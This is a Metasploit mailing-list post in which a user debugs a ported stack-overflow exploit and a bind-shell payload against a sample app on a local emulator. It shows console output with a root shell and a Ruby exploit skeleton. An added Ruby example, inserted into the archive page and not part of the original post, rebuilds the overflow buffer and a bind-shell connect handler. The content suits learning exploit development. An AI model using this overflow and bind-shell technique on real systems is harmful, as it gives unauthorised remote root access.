Metasploit mailing list archives
Unsuccessful connection after successful exploit
From: Eloi Sanfèlix <eloi () limited-entropy com>
Date: Thu, 11 Feb 2010 20:16:05 +0100
Hi all,

I'm quite new to Metasploit, and I've started by porting a little exploit for a sample vulnerable app I had on my hard disk. I also ported an execve payload and a bind shell payload just to see how the framework works.

When I run the exploit with the execve shellcode everything is fine: I can see my shell pop in the attacked process under an emulator. However, when I run the bind shell payload something weird happens. On the first attempt, Metasploit tries to connect to the new session, but fails and closes the session:

    msf exploit(stack) > set payload shell_bind_tcp
    msf exploit(stack) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf exploit(stack) > set LPORT 1234
    LPORT => 1234
    msf exploit(stack) > exploit
    [*] Started bind handler
    [*] Command shell session 1 opened (127.0.0.1:39112 -> 127.0.0.1:1234)
    [*] Command shell session 1 closed.

However, if I look at my emulated system, the exploit actually succeeded and it is executing a shell and listening for incoming connections on the selected port. Now, if I call exploit again, Metasploit successfully connects to the shell created previously, as you can see below:

    msf exploit(stack) > exploit
    [*] Started bind handler
    [*] Command shell session 2 opened (127.0.0.1:59482 -> 127.0.0.1:1234)
    /bin/id
    uid=0(root) gid=0(root)

I tried to understand what is happening, but I fail to do so. In case it is useful, here is the basic structure of my exploit:

    def exploit
      connect
      # Pad up to the saved return address with 4-byte "AAAA" units
      repeat = target['Offset'] / 4
      junk = "AAAA" * repeat
      # Overwrite the return address (little-endian), then append the encoded payload
      sploit = junk + [target.ret].pack('V') + payload.encoded
      # Prefix the buffer with its 4-byte little-endian length
      real_sploit = [sploit.length].pack('V') + sploit
      sock.put(real_sploit)
      handler
      disconnect
    end

Pretty simple, as you can see. Also, the payload has the same structure as any other Bind TCP payload. Specifically, it defines the following handler and session options:

    'Handler' => Msf::Handler::BindTcp,
    'Session' => Msf::Sessions::CommandShell,

Does anyone have an idea about why it could go wrong?

Thanks in advance for your feedback,
Eloi

PS: I also tried adding a little delay between sending the payload and calling handler, but it doesn't help.
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
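An added, stand-alone Ruby example (not code from the post above and not Metasploit framework code) that reproduces the two pieces the post describes outside the framework: the buffer layout (length prefix, "AAAA" padding, little-endian return address, payload) and the bind-handler side of the exchange. The handler here does what a practitioner would want to verify when a bind session opens and immediately closes: it keeps connecting until the port actually accepts, then sends one command and only treats the session as live once a reply comes back. The fake bind shell, the free_port helper, the 0.5 s start delay and the offset/return-address values are all constructed for this example; it does not claim to be the cause of the behaviour in the post.

```ruby
require 'socket'

# Layout from the post: a 4-byte little-endian length prefix, then
# "AAAA" padding up to the saved return address, the return address
# packed little-endian ('V'), then the raw payload bytes.
def build_sploit(offset, ret, payload)
  junk = ('AAAA' * (offset / 4)).b
  sploit = junk + [ret].pack('V') + payload.b
  [sploit.bytesize].pack('V') + sploit
end

# Bind-handler style connect: keep retrying while the target refuses the
# connection (the shellcode may not have reached listen() yet), up to a
# deadline. Returns the connected TCPSocket, or nil if nothing ever listened.
def connect_with_retry(host, port, timeout: 5.0, interval: 0.2)
  deadline = Time.now + timeout
  loop do
    begin
      return TCPSocket.new(host, port)
    rescue Errno::ECONNREFUSED, Errno::ETIMEDOUT, Errno::EHOSTUNREACH
      return nil if Time.now >= deadline
      sleep interval
    end
  end
end

# Liveness check: once connected, send one command and insist on a reply
# before reporting the session as usable. Returns the stripped reply line,
# or nil if no listener appeared or the peer closed without answering.
def run_id_over_session(host, port, timeout: 5.0)
  sock = connect_with_retry(host, port, timeout: timeout)
  return nil unless sock
  sock.puts '/bin/id'
  reply = sock.gets
  sock.close
  reply && reply.strip
end

# Scaffolding constructed for this example (not a real target): pick a free
# loopback port, then start a fake "bind shell" on it after an optional
# delay so the retry path above is actually exercised.
def free_port
  s = TCPServer.new('127.0.0.1', 0)
  port = s.addr[1]
  s.close
  port
end

def start_fake_bind_shell(port, delay: 0.0)
  Thread.new do
    sleep delay
    server = TCPServer.new('127.0.0.1', port)
    client = server.accept
    line = client.gets
    answer = (line && line.strip == '/bin/id') ? 'uid=0(root) gid=0(root)' : 'sh: not found'
    client.puts answer
    client.close
    server.close
  end
end

if __FILE__ == $0
  port = free_port
  shell = start_fake_bind_shell(port, delay: 0.5)
  puts build_sploit(8, 0x41424344, "\xcc".b).unpack1('H*')
  puts run_id_over_session('127.0.0.1', port).inspect
  shell.join
end
```

With the listener starting half a second late, a handler that connected exactly once and gave up would report nothing; the retry loop makes the handler wait for the listener, and returning the reply rather than just the socket keeps "session opened" tied to the shell actually answering.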
Current thread:
- Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit HD Moore (Feb 11)
- Re: Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit Patrick Webster (Feb 11)
- Re: Unsuccessful connection after successful exploit Eloi Sanfèlix (Feb 11)
- Re: Unsuccessful connection after successful exploit HD Moore (Feb 11)